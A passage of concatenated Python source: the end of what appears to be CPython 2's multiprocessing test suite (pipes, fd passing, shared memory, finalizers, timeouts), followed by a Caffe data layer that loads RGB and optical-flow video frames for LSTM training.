TIMEOUT1) conn.send(None) time.sleep(.1) self.assertEqual(poll(TIMEOUT1), True) self.assertTimingAlmostEqual(poll.elapsed, 0) self.assertEqual(conn.recv(), None) really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb conn.send_bytes(really_big_msg) self.assertEqual(conn.recv_bytes(), really_big_msg) conn.send_bytes(SENTINEL) # tell child to quit child_conn.close() if self.TYPE == 'processes': self.assertEqual(conn.readable, True) self.assertEqual(conn.writable, True) 
self.assertRaises(EOFError, conn.recv) self.assertRaises(EOFError, conn.recv_bytes) p.join() def test_duplex_false(self): reader, writer = self.Pipe(duplex=False) self.assertEqual(writer.send(1), None) self.assertEqual(reader.recv(), 1) if self.TYPE == 'processes': self.assertEqual(reader.readable, True) self.assertEqual(reader.writable, False) self.assertEqual(writer.readable, False) self.assertEqual(writer.writable, True) self.assertRaises(IOError, reader.send, 2) self.assertRaises(IOError, writer.recv) self.assertRaises(IOError, writer.poll) def test_spawn_close(self): # We test that a pipe connection can be closed by parent # process immediately after child is spawned. On Windows this # would have sometimes failed on old versions because # child_conn would be closed before the child got a chance to # duplicate it. conn, child_conn = self.Pipe() p = self.Process(target=self._echo, args=(child_conn,)) p.daemon = True p.start() child_conn.close() # this might complete before child initializes msg = latin('hello') conn.send_bytes(msg) self.assertEqual(conn.recv_bytes(), msg) conn.send_bytes(SENTINEL) conn.close() p.join() def test_sendbytes(self): if self.TYPE != 'processes': return msg = latin('abcdefghijklmnopqrstuvwxyz') a, b = self.Pipe() a.send_bytes(msg) self.assertEqual(b.recv_bytes(), msg) a.send_bytes(msg, 5) self.assertEqual(b.recv_bytes(), msg[5:]) a.send_bytes(msg, 7, 8) self.assertEqual(b.recv_bytes(), msg[7:7+8]) a.send_bytes(msg, 26) self.assertEqual(b.recv_bytes(), latin('')) a.send_bytes(msg, 26, 0) self.assertEqual(b.recv_bytes(), latin('')) self.assertRaises(ValueError, a.send_bytes, msg, 27) self.assertRaises(ValueError, a.send_bytes, msg, 22, 5) self.assertRaises(ValueError, a.send_bytes, msg, 26, 1) self.assertRaises(ValueError, a.send_bytes, msg, -1) self.assertRaises(ValueError, a.send_bytes, msg, 4, -1) @classmethod def _is_fd_assigned(cls, fd): try: os.fstat(fd) except OSError as e: if e.errno == errno.EBADF: return False raise else: return True @classmethod def _writefd(cls, conn, data, create_dummy_fds=False): if create_dummy_fds: for i in range(0, 256): if not cls._is_fd_assigned(i): os.dup2(conn.fileno(), i) fd = reduction.recv_handle(conn) if msvcrt: fd = msvcrt.open_osfhandle(fd, os.O_WRONLY) os.write(fd, data) os.close(fd) @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction") def test_fd_transfer(self): if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._writefd, args=(child_conn, b"foo")) p.daemon = True p.start() with open(test_support.TESTFN, "wb") as f: fd = f.fileno() if msvcrt: fd = msvcrt.get_osfhandle(fd) reduction.send_handle(conn, fd, p.pid) p.join() with open(test_support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"foo") @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction") @unittest.skipIf(sys.platform == "win32", "test semantics don't make sense on Windows") @unittest.skipIf(MAXFD <= 256, "largest assignable fd number is too small") @unittest.skipUnless(hasattr(os, "dup2"), "test needs os.dup2()") def test_large_fd_transfer(self): # With fd > 256 (issue #11657) if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._writefd, args=(child_conn, b"bar", True)) p.daemon = True p.start() with open(test_support.TESTFN, "wb") as f: fd = f.fileno() for newfd in range(256, MAXFD): if not self._is_fd_assigned(newfd): 
break else: self.fail("could not find an unassigned large file descriptor") os.dup2(fd, newfd) try: reduction.send_handle(conn, newfd, p.pid) finally: os.close(newfd) p.join() with open(test_support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"bar") @classmethod def _send_data_without_fd(self, conn): os.write(conn.fileno(), b"\0") @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction") @unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows") def test_missing_fd_transfer(self): # Check that exception is raised when received data is not # accompanied by a file descriptor in ancillary data. if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._send_data_without_fd, args=(child_conn,)) p.daemon = True p.start() self.assertRaises(RuntimeError, reduction.recv_handle, conn) p.join() class _TestListenerClient(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') @classmethod def _test(cls, address): conn = cls.connection.Client(address) conn.send('hello') conn.close() def test_listener_client(self): for family in self.connection.families: l = self.connection.Listener(family=family) p = self.Process(target=self._test, args=(l.address,)) p.daemon = True p.start() conn = l.accept() self.assertEqual(conn.recv(), 'hello') p.join() l.close() def test_issue14725(self): l = self.connection.Listener() p = self.Process(target=self._test, args=(l.address,)) p.daemon = True p.start() time.sleep(1) # On Windows the client process should by now have connected, # written data and closed the pipe handle by now. This causes # ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue # 14725. conn = l.accept() self.assertEqual(conn.recv(), 'hello') conn.close() p.join() l.close() # # Test of sending connection and socket objects between processes # """ class _TestPicklingConnections(BaseTestCase): ALLOWED_TYPES = ('processes',) def _listener(self, conn, families): for fam in families: l = self.connection.Listener(family=fam) conn.send(l.address) new_conn = l.accept() conn.send(new_conn) if self.TYPE == 'processes': l = socket.socket() l.bind(('localhost', 0)) conn.send(l.getsockname()) l.listen(1) new_conn, addr = l.accept() conn.send(new_conn) conn.recv() def _remote(self, conn): for (address, msg) in iter(conn.recv, None): client = self.connection.Client(address) client.send(msg.upper()) client.close() if self.TYPE == 'processes': address, msg = conn.recv() client = socket.socket() client.connect(address) client.sendall(msg.upper()) client.close() conn.close() def test_pickling(self): try: multiprocessing.allow_connection_pickling() except ImportError: return families = self.connection.families lconn, lconn0 = self.Pipe() lp = self.Process(target=self._listener, args=(lconn0, families)) lp.daemon = True lp.start() lconn0.close() rconn, rconn0 = self.Pipe() rp = self.Process(target=self._remote, args=(rconn0,)) rp.daemon = True rp.start() rconn0.close() for fam in families: msg = ('This connection uses family %s' % fam).encode('ascii') address = lconn.recv() rconn.send((address, msg)) new_conn = lconn.recv() self.assertEqual(new_conn.recv(), msg.upper()) rconn.send(None) if self.TYPE == 'processes': msg = latin('This connection uses a normal socket') address = lconn.recv() rconn.send((address, msg)) if hasattr(socket, 'fromfd'): new_conn = lconn.recv() self.assertEqual(new_conn.recv(100), msg.upper()) else: # XXX On Windows with Py2.6 need to backport fromfd() discard = 
lconn.recv_bytes() lconn.send(None) rconn.close() lconn.close() lp.join() rp.join() """ # # # class _TestHeap(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_heap(self): iterations = 5000 maxblocks = 50 blocks = [] # create and destroy lots of blocks of different sizes for i in xrange(iterations): size = int(random.lognormvariate(0, 1) * 1000) b = multiprocessing.heap.BufferWrapper(size) blocks.append(b) if len(blocks) > maxblocks: i = random.randrange(maxblocks) del blocks[i] # get the heap object heap = multiprocessing.heap.BufferWrapper._heap # verify the state of the heap all = [] occupied = 0 heap._lock.acquire() self.addCleanup(heap._lock.release) for L in heap._len_to_seq.values(): for arena, start, stop in L: all.append((heap._arenas.index(arena), start, stop, stop-start, 'free')) for arena, start, stop in heap._allocated_blocks: all.append((heap._arenas.index(arena), start, stop, stop-start, 'occupied')) occupied += (stop-start) all.sort() for i in range(len(all)-1): (arena, start, stop) = all[i][:3] (narena, nstart, nstop) = all[i+1][:3] self.assertTrue((arena != narena and nstart == 0) or (stop == nstart)) def test_free_from_gc(self): # Check that freeing of blocks by the garbage collector doesn't deadlock # (issue #12352). # Make sure the GC is enabled, and set lower collection thresholds to # make collections more frequent (and increase the probability of # deadlock). if not gc.isenabled(): gc.enable() self.addCleanup(gc.disable) thresholds = gc.get_threshold() self.addCleanup(gc.set_threshold, *thresholds) gc.set_threshold(10) # perform numerous block allocations, with cyclic references to make # sure objects are collected asynchronously by the gc for i in range(5000): a = multiprocessing.heap.BufferWrapper(1) b = multiprocessing.heap.BufferWrapper(1) # circular references a.buddy = b b.buddy = a # # # class _Foo(Structure): _fields_ = [ ('x', c_int), ('y', c_double) ] class _TestSharedCTypes(BaseTestCase): ALLOWED_TYPES = ('processes',) def setUp(self): if not HAS_SHAREDCTYPES: self.skipTest("requires multiprocessing.sharedctypes") @classmethod def _double(cls, x, y, foo, arr, string): x.value *= 2 y.value *= 2 foo.x *= 2 foo.y *= 2 string.value *= 2 for i in range(len(arr)): arr[i] *= 2 def test_sharedctypes(self, lock=False): x = Value('i', 7, lock=lock) y = Value(c_double, 1.0/3.0, lock=lock) foo = Value(_Foo, 3, 2, lock=lock) arr = self.Array('d', range(10), lock=lock) string = self.Array('c', 20, lock=lock) string.value = latin('hello') p = self.Process(target=self._double, args=(x, y, foo, arr, string)) p.daemon = True p.start() p.join() self.assertEqual(x.value, 14) self.assertAlmostEqual(y.value, 2.0/3.0) self.assertEqual(foo.x, 6) self.assertAlmostEqual(foo.y, 4.0) for i in range(10): self.assertAlmostEqual(arr[i], i*2) self.assertEqual(string.value, latin('hellohello')) def test_synchronize(self): self.test_sharedctypes(lock=True) def test_copy(self): foo = _Foo(2, 5.0) bar = copy(foo) foo.x = 0 foo.y = 0 self.assertEqual(bar.x, 2) self.assertAlmostEqual(bar.y, 5.0) # # # class _TestFinalize(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def _test_finalize(cls, conn): class Foo(object): pass a = Foo() util.Finalize(a, conn.send, args=('a',)) del a # triggers callback for a b = Foo() close_b = util.Finalize(b, conn.send, args=('b',)) close_b() # triggers callback for b close_b() # does nothing because callback has already been called del b # does nothing because callback has already been called c = Foo() util.Finalize(c, conn.send, args=('c',)) 
d10 = Foo() util.Finalize(d10, conn.send, args=('d10',), exitpriority=1) d01 = Foo() util.Finalize(d01, conn.send, args=('d01',), exitpriority=0) d02 = Foo() util.Finalize(d02, conn.send, args=('d02',), exitpriority=0) d03 = Foo() util.Finalize(d03, conn.send, args=('d03',), exitpriority=0) util.Finalize(None, conn.send, args=('e',), exitpriority=-10) util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100) # call multiprocessing's cleanup function then exit process without # garbage collecting locals util._exit_function() conn.close() os._exit(0) def test_finalize(self): conn, child_conn = self.Pipe() p = self.Process(target=self._test_finalize, args=(child_conn,)) p.daemon = True p.start() p.join() result = [obj for obj in iter(conn.recv, 'STOP')] self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e']) # # Test that from ... import * works for each module # class _TestImportStar(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_import(self): modules = [ 'multiprocessing', 'multiprocessing.connection', 'multiprocessing.heap', 'multiprocessing.managers', 'multiprocessing.pool', 'multiprocessing.process', 'multiprocessing.synchronize', 'multiprocessing.util' ] if HAS_REDUCTION: modules.append('multiprocessing.reduction') if c_int is not None: # This module requires _ctypes modules.append('multiprocessing.sharedctypes') for name in modules: __import__(name) mod = sys.modules[name] for attr in getattr(mod, '__all__', ()): self.assertTrue( hasattr(mod, attr), '%r does not have attribute %r' % (mod, attr) ) # # Quick test that logging works -- does not test logging output # class _TestLogging(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_enable_logging(self): logger = multiprocessing.get_logger() logger.setLevel(util.SUBWARNING) self.assertTrue(logger is not None) logger.debug('this will not be printed') logger.info('nor will this') logger.setLevel(LOG_LEVEL) @classmethod def _test_level(cls, conn): logger = multiprocessing.get_logger() conn.send(logger.getEffectiveLevel()) def test_level(self): LEVEL1 = 32 LEVEL2 = 37 logger = multiprocessing.get_logger() root_logger = logging.getLogger() root_level = root_logger.level reader, writer = multiprocessing.Pipe(duplex=False) logger.setLevel(LEVEL1) p = self.Process(target=self._test_level, args=(writer,)) p.daemon = True p.start() self.assertEqual(LEVEL1, reader.recv()) logger.setLevel(logging.NOTSET) root_logger.setLevel(LEVEL2) p = self.Process(target=self._test_level, args=(writer,)) p.daemon = True p.start() self.assertEqual(LEVEL2, reader.recv()) root_logger.setLevel(root_level) logger.setLevel(level=LOG_LEVEL) # class _TestLoggingProcessName(BaseTestCase): # # def handle(self, record): # assert record.processName == multiprocessing.current_process().name # self.__handled = True # # def test_logging(self): # handler = logging.Handler() # handler.handle = self.handle # self.__handled = False # # Bypass getLogger() and side-effects # logger = logging.getLoggerClass()( # 'multiprocessing.test.TestLoggingProcessName') # logger.addHandler(handler) # logger.propagate = False # # logger.warn('foo') # assert self.__handled # # Check that Process.join() retries if os.waitpid() fails with EINTR # class _TestPollEintr(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def _killer(cls, pid): time.sleep(0.5) os.kill(pid, signal.SIGUSR1) @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1') def test_poll_eintr(self): got_signal = [False] def record(*args): got_signal[0] = True pid = os.getpid() 
oldhandler = signal.signal(signal.SIGUSR1, record) try: killer = self.Process(target=self._killer, args=(pid,)) killer.start() p = self.Process(target=time.sleep, args=(1,)) p.start() p.join() self.assertTrue(got_signal[0]) self.assertEqual(p.exitcode, 0) killer.join() finally: signal.signal(signal.SIGUSR1, oldhandler) # # Test to verify handle verification, see issue 3321 # class TestInvalidHandle(unittest.TestCase): @unittest.skipIf(WIN32, "skipped on Windows") def test_invalid_handles(self): conn = _multiprocessing.Connection(44977608) self.assertRaises(IOError, conn.poll) self.assertRaises(IOError, _multiprocessing.Connection, -1) # # Functions used to create test cases from the base ones in this module # def get_attributes(Source, names): d = {} for name in names: obj = getattr(Source, name) if type(obj) == type(get_attributes): obj = staticmethod(obj) d[name] = obj return d def create_test_cases(Mixin, type): result = {} glob = globals() Type = type.capitalize() for name in glob.keys(): if name.startswith('_Test'): base = glob[name] if type in base.ALLOWED_TYPES: newname = 'With' + Type + name[1:] class Temp(base, unittest.TestCase, Mixin): pass result[newname] = Temp Temp.__name__ = newname Temp.__module__ = Mixin.__module__ return result # # Create test cases # class ProcessesMixin(object): TYPE = 'processes' Process = multiprocessing.Process locals().update(get_attributes(multiprocessing, ( 'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event', 'Value', 'Array', 'RawValue', 'RawArray', 'current_process', 'active_children', 'Pipe', 'connection', 'JoinableQueue', 'Pool' ))) testcases_processes = create_test_cases(ProcessesMixin, type='processes') globals().update(testcases_processes) class ManagerMixin(object): TYPE = 'manager' Process = multiprocessing.Process manager = object.__new__(multiprocessing.managers.SyncManager) locals().update(get_attributes(manager, ( 'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event', 'Value', 'Array', 'list', 'dict', 'Namespace', 'JoinableQueue', 'Pool' ))) testcases_manager = create_test_cases(ManagerMixin, type='manager') globals().update(testcases_manager) class ThreadsMixin(object): TYPE = 'threads' Process = multiprocessing.dummy.Process locals().update(get_attributes(multiprocessing.dummy, ( 'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event', 'Value', 'Array', 'current_process', 'active_children', 'Pipe', 'connection', 'dict', 'list', 'Namespace', 'JoinableQueue', 'Pool' ))) testcases_threads = create_test_cases(ThreadsMixin, type='threads') globals().update(testcases_threads) class OtherTest(unittest.TestCase): # TODO: add more tests for deliver/answer challenge. 
def test_deliver_challenge_auth_failure(self): class _FakeConnection(object): def recv_bytes(self, size): return b'something bogus' def send_bytes(self, data): pass self.assertRaises(multiprocessing.AuthenticationError, multiprocessing.connection.deliver_challenge, _FakeConnection(), b'abc') def test_answer_challenge_auth_failure(self): class _FakeConnection(object): def __init__(self): self.count = 0 def recv_bytes(self, size): self.count += 1 if self.count == 1: return multiprocessing.connection.CHALLENGE elif self.count == 2: return b'something bogus' return b'' def send_bytes(self, data): pass self.assertRaises(multiprocessing.AuthenticationError, multiprocessing.connection.answer_challenge, _FakeConnection(), b'abc') # # Test Manager.start()/Pool.__init__() initializer feature - see issue 5585 # def initializer(ns): ns.test += 1 class TestInitializers(unittest.TestCase): def setUp(self): self.mgr = multiprocessing.Manager() self.ns = self.mgr.Namespace() self.ns.test = 0 def tearDown(self): self.mgr.shutdown() def test_manager_initializer(self): m = multiprocessing.managers.SyncManager() self.assertRaises(TypeError, m.start, 1) m.start(initializer, (self.ns,)) self.assertEqual(self.ns.test, 1) m.shutdown() def test_pool_initializer(self): self.assertRaises(TypeError, multiprocessing.Pool, initializer=1) p = multiprocessing.Pool(1, initializer, (self.ns,)) p.close() p.join() self.assertEqual(self.ns.test, 1) # # Issue 5155, 5313, 5331: Test process in processes # Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior # def _ThisSubProcess(q): try: item = q.get(block=False) except Queue.Empty: pass def _TestProcess(q): queue = multiprocessing.Queue() subProc = multiprocessing.Process(target=_ThisSubProcess, args=(queue,)) subProc.daemon = True subProc.start() subProc.join() def _afunc(x): return x*x def pool_in_process(): pool = multiprocessing.Pool(processes=4) x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7]) class _file_like(object): def __init__(self, delegate): self._delegate = delegate self._pid = None @property def cache(self): pid = os.getpid() # There are no race conditions since fork keeps only the running thread if pid != self._pid: self._pid = pid self._cache = [] return self._cache def write(self, data): self.cache.append(data) def flush(self): self._delegate.write(''.join(self.cache)) self._cache = [] class TestStdinBadfiledescriptor(unittest.TestCase): def test_queue_in_process(self): queue = multiprocessing.Queue() proc = multiprocessing.Process(target=_TestProcess, args=(queue,)) proc.start() proc.join() def test_pool_in_process(self): p = multiprocessing.Process(target=pool_in_process) p.start() p.join() def test_flushing(self): sio = StringIO() flike = _file_like(sio) flike.write('foo') proc = multiprocessing.Process(target=lambda: flike.flush()) flike.flush() assert sio.getvalue() == 'foo' # # Test interaction with socket timeouts - see Issue #6056 # class TestTimeouts(unittest.TestCase): @classmethod def _test_timeout(cls, child, address): time.sleep(1) child.send(123) child.close() conn = multiprocessing.connection.Client(address) conn.send(456) conn.close() def test_timeout(self): old_timeout = socket.getdefaulttimeout() try: socket.setdefaulttimeout(0.1) parent, child = multiprocessing.Pipe(duplex=True) l = multiprocessing.connection.Listener(family='AF_INET') p = multiprocessing.Process(target=self._test_timeout, args=(child, l.address)) p.start() child.close() self.assertEqual(parent.recv(), 123) parent.close() conn = l.accept() 
self.assertEqual(conn.recv(), 456) conn.close() l.close() p.join(10) finally: socket.setdefaulttimeout(old_timeout) # # Test what happens with no "if __name__ == '__main__'" # class TestNoForkBomb(unittest.TestCase): def test_noforkbomb(self): name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py') if WIN32: rc, out, err = test.script_helper.assert_python_failure(name) self.assertEqual('', out.decode('ascii')) self.assertIn('RuntimeError', err.decode('ascii')) else: rc, out, err = test.script_helper.assert_python_ok(name) self.assertEqual('123', out.decode('ascii').rstrip()) self.assertEqual('', err.decode('ascii')) # # # testcases_other = [OtherTest, TestInvalidHandle, TestInitializers, TestStdinBadfiledescriptor, TestTimeouts, TestNoForkBomb] # # # def test_main(run=None): if sys.platform.startswith("linux"): try: lock = multiprocessing.RLock() except OSError: raise unittest.SkipTest("OSError raises on RLock creation, see issue 3111!") check_enough_semaphores() if run is None: from test.test_support import run_unittest as run util.get_temp_dir() # creates temp directory for use by all processes multiprocessing.get_logger().setLevel(LOG_LEVEL) ProcessesMixin.pool = multiprocessing.Pool(4) ThreadsMixin.pool = multiprocessing.dummy.Pool(4) ManagerMixin.manager.__init__() ManagerMixin.manager.start() ManagerMixin.pool = ManagerMixin.manager.Pool(4) testcases = ( sorted(testcases_processes.values(), key=lambda tc:tc.__name__) + sorted(testcases_threads.values(), key=lambda tc:tc.__name__) + sorted(testcases_manager.values(), key=lambda tc:tc.__name__) + testcases_other ) loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases) # (ncoghlan): Whether or not sys.exc_clear is executed by the threading # module during these tests is at least platform dependent and possibly # non-deterministic on any given platform. So we don't mind if the listed # warnings aren't actually raised. with test_support.check_py3k_warnings( (".+__(get|set)slice__ has been removed", DeprecationWarning), (r"sys.exc_clear\(\) not supported", DeprecationWarning), quiet=True): run(suite) ThreadsMixin.pool.terminate() ProcessesMixin.pool.terminate() ManagerMixin.pool.terminate() ManagerMixin.manager.shutdown() del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool def main(): test_main(unittest.TextTestRunner(verbosity=2).run) if __name__ == '__main__': main()
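# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original test suite): create_test_cases()
# above builds one concrete TestCase per backend by mixing a backend mixin
# (ProcessesMixin / ThreadsMixin / ManagerMixin) into each _Test* base class.
# The toy names below (_ToyMixin, _ToyBase) are hypothetical and only show the
# same dynamic class construction in isolation; nothing here is executed or
# collected by test_main().
def _illustrate_mixin_test_generation():
    import unittest as _ut

    class _ToyMixin(object):
        # plays the role of ProcessesMixin etc.: supplies the backend-specific
        # attributes the base tests rely on
        TYPE = 'toy'

    class _ToyBase(object):
        # plays the role of a _Test* base class
        ALLOWED_TYPES = ('toy',)
        def test_type(self):
            self.assertEqual(self.TYPE, 'toy')

    # equivalent to the `class Temp(base, unittest.TestCase, Mixin)` statement
    # built inside create_test_cases(), using type() directly
    name = 'WithToy' + _ToyBase.__name__[1:]
    generated = type(name, (_ToyBase, _ut.TestCase, _ToyMixin), {})
    return generated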
sequence_input_layer.py
#!/usr/bin/env python #Data layer for video. Change flow_frames and RGB_frames to be the path to the flow and RGB frames. import sys sys.path.append('../../python') import caffe import io from PIL import Image import matplotlib.pyplot as plt import numpy as np import scipy.misc import time import pdb import glob import pickle as pkl import random import h5py from multiprocessing import Pool from threading import Thread import skimage.io import copy flow_frames = 'flow_images/' RGB_frames = 'frames/' test_frames = 16 train_frames = 16 test_buffer = 3 train_buffer = 24 def processImageCrop(im_info, transformer, flow): im_path = im_info[0] im_crop = im_info[1] im_reshape = im_info[2] im_flip = im_info[3] data_in = caffe.io.load_image(im_path) if (data_in.shape[0] < im_reshape[0]) | (data_in.shape[1] < im_reshape[1]): data_in = caffe.io.resize_image(data_in, im_reshape) if im_flip: data_in = caffe.io.flip_image(data_in, 1, flow) data_in = data_in[im_crop[0]:im_crop[2], im_crop[1]:im_crop[3], :] processed_image = transformer.preprocess('data_in',data_in) return processed_image class ImageProcessorCrop(object): def __init__(self, transformer, flow): self.transformer = transformer self.flow = flow def __call__(self, im_info): return processImageCrop(im_info, self.transformer, self.flow) class sequenceGeneratorVideo(object): def __init__(self, buffer_size, clip_length, num_videos, video_dict, video_order): self.buffer_size = buffer_size self.clip_length = clip_length self.N = self.buffer_size*self.clip_length self.num_videos = num_videos self.video_dict = video_dict self.video_order = video_order self.idx = 0 def __call__(self): label_r = [] im_paths = [] im_crop = [] im_reshape = [] im_flip = [] if self.idx + self.buffer_size >= self.num_videos: idx_list = range(self.idx, self.num_videos) idx_list.extend(range(0, self.buffer_size-(self.num_videos-self.idx))) else: idx_list = range(self.idx, self.idx+self.buffer_size) for i in idx_list: key = self.video_order[i] label = self.video_dict[key]['label'] video_reshape = self.video_dict[key]['reshape'] video_crop = self.video_dict[key]['crop'] label_r.extend([label]*self.clip_length) im_reshape.extend([(video_reshape)]*self.clip_length) r0 = int(random.random()*(video_reshape[0] - video_crop[0])) r1 = int(random.random()*(video_reshape[1] - video_crop[1])) im_crop.extend([(r0, r1, r0+video_crop[0], r1+video_crop[1])]*self.clip_length) f = random.randint(0,1) im_flip.extend([f]*self.clip_length) rand_frame = int(random.random()*(self.video_dict[key]['num_frames']-self.clip_length)+1+1) frames = [] for i in range(rand_frame,rand_frame+self.clip_length): frames.append(self.video_dict[key]['frames'] %i) im_paths.extend(frames) im_info = zip(im_paths,im_crop, im_reshape, im_flip) self.idx += self.buffer_size if self.idx >= self.num_videos: self.idx = self.idx - self.num_videos return label_r, im_info def advance_batch(result, sequence_generator, image_processor, pool): label_r, im_info = sequence_generator() tmp = image_processor(im_info[0]) result['data'] = pool.map(image_processor, im_info) result['label'] = label_r cm = np.ones(len(label_r)) cm[0::16] = 0 result['clip_markers'] = cm class BatchAdvancer(): def __init__(self, result, sequence_generator, image_processor, pool): self.result = result self.sequence_generator = sequence_generator self.image_processor = image_processor self.pool = pool def __call__(self): return advance_batch(self.result, self.sequence_generator, self.image_processor, self.pool) class videoRead(caffe.Layer): def initialize(self): 
self.train_or_test = 'test' self.flow = False self.buffer_size = test_buffer #num videos processed per batch self.frames = test_frames #length of processed clip self.N = self.buffer_size*self.frames self.idx = 0 self.channels = 3 self.height = 227 self.width = 227 self.path_to_images = RGB_frames self.video_list = 'ts_lstm.txt' def setup(self, bottom, top): random.seed(10) self.initialize() f = open(self.video_list, 'r') f_lines = f.readlines() f.close() video_dict = {} current_line = 0 self.video_order = [] for ix, line in enumerate(f_lines): video = line.split(' ')[0] l = int(line.split(' ')[1]) frames = glob.glob('%s%s/*.jpg' %(self.path_to_images, video)) num_frames = len(frames) video_dict[video] = {} video_dict[video]['frames'] = frames[0].split('.')[0] + '.%04d.jpg' video_dict[video]['reshape'] = (240,320) video_dict[video]['crop'] = (227, 227) video_dict[video]['num_frames'] = num_frames video_dict[video]['label'] = l self.video_order.append(video) self.video_dict = video_dict self.num_videos = len(video_dict.keys()) #set up data transformer shape = (self.N, self.channels, self.height, self.width) self.transformer = caffe.io.Transformer({'data_in': shape}) self.transformer.set_raw_scale('data_in', 255) if self.flow: image_mean = [128, 128, 128] self.transformer.set_is_flow('data_in', True) else: image_mean = [103.939, 116.779, 128.68] self.transformer.set_is_flow('data_in', False) channel_mean = np.zeros((3,227,227)) for channel_index, mean_val in enumerate(image_mean): channel_mean[channel_index, ...] = mean_val self.transformer.set_mean('data_in', channel_mean) self.transformer.set_channel_swap('data_in', (2, 1, 0)) self.transformer.set_transpose('data_in', (2, 0, 1)) self.thread_result = {} self.thread = None pool_size = 24 self.image_processor = ImageProcessorCrop(self.transformer, self.flow) self.sequence_generator = sequenceGeneratorVideo(self.buffer_size, self.frames, self.num_videos, self.video_dict, self.video_order) self.pool = Pool(processes=pool_size) self.batch_advancer = BatchAdvancer(self.thread_result, self.sequence_generator, self.image_processor, self.pool) self.dispatch_worker() self.top_names = ['data', 'label','clip_markers'] print 'Outputs:', self.top_names if len(top) != len(self.top_names): raise Exception('Incorrect number of outputs (expected %d, got %d)' % (len(self.top_names), len(top))) self.join_worker() for top_index, name in enumerate(self.top_names): if name == 'data': shape = (self.N, self.channels, self.height, self.width) elif name == 'label': shape = (self.N,) elif name == 'clip_markers': shape = (self.N,) top[top_index].reshape(*shape) def reshape(self, bottom, top): pass def forward(self, bottom, top): if self.thread is not None: self.join_worker() #rearrange the data: The LSTM takes inputs as [video0_frame0, video1_frame0,...] but the data is currently arranged as [video0_frame0, video0_frame1, ...] new_result_data = [None]*len(self.thread_result['data']) new_result_label = [None]*len(self.thread_result['label']) new_result_cm = [None]*len(self.thread_result['clip_markers']) for i in range(self.frames): for ii in range(self.buffer_size): old_idx = ii*self.frames + i new_idx = i*self.buffer_size + ii new_result_data[new_idx] = self.thread_result['data'][old_idx] new_result_label[new_idx] = self.thread_result['label'][old_idx] new_result_cm[new_idx] = self.thread_result['clip_markers'][old_idx] for top_index, name in zip(range(len(top)), self.top_names): if name == 'data': for i in range(self.N): top[top_index].data[i, ...] 
= new_result_data[i] elif name == 'label': top[top_index].data[...] = new_result_label elif name == 'clip_markers': top[top_index].data[...] = new_result_cm self.dispatch_worker() def dispatch_worker(self): assert self.thread is None self.thread = Thread(target=self.batch_advancer) self.thread.start() def join_worker(self): assert self.thread is not None self.thread.join() self.thread = None def backward(self, top, propagate_down, bottom): pass class videoReadTrain_flow(videoRead): def initialize(self): self.train_or_test = 'train' self.flow = True self.buffer_size = train_buffer #num videos processed per batch self.frames = train_frames #length of processed clip self.N = self.buffer_size*self.frames self.idx = 0 self.channels = 3 self.height = 227 self.width = 227 self.path_to_images = flow_frames self.video_list = 'tr_lstm.txt' class videoReadTest_flow(videoRead): def initialize(self): self.train_or_test = 'test' self.flow = True self.buffer_size = test_buffer #num videos processed per batch self.frames = test_frames #length of processed clip self.N = self.buffer_size*self.frames self.idx = 0 self.channels = 3 self.height = 227 self.width = 227 self.path_to_images = flow_frames self.video_list = 'ts_lstm.txt' class videoReadTrain_RGB(videoRead): def initialize(self): self.train_or_test = 'train' self.flow = False self.buffer_size = train_buffer #num videos processed per batch self.frames = train_frames #length of processed clip self.N = self.buffer_size*self.frames self.idx = 0 self.channels = 3 self.height = 227 self.width = 227 self.path_to_images = RGB_frames self.video_list = 'tr_lstm.txt' class videoReadTest_RGB(videoRead): def initialize(self): self.train_or_test = 'test' self.flow = False self.buffer_size = test_buffer #num videos processed per batch self.frames = test_frames #length of processed clip self.N = self.buffer_size*self.frames self.idx = 0 self.channels = 3 self.height = 227 self.width = 227 self.path_to_images = RGB_frames self.video_list = 'ts_lstm.txt'
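# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original layer): the index shuffle in
# videoRead.forward() converts the prefetched batch from video-major order
# ([video0_frame0, video0_frame1, ...]) to the frame-major order the LSTM
# expects ([video0_frame0, video1_frame0, ...]).  The helper below shows the
# same reordering done with a numpy reshape/transpose; the function name and
# default sizes are hypothetical and exist only for demonstration.
def _illustrate_frame_major_reorder(buffer_size=3, clip_length=4):
    import numpy as np
    n = buffer_size * clip_length
    video_major = np.arange(n)                       # stand-in for the data blobs
    frame_major = (video_major.reshape(buffer_size, clip_length)
                              .transpose(1, 0)
                              .reshape(n))
    # frame_major[i * buffer_size + ii] == video_major[ii * clip_length + i],
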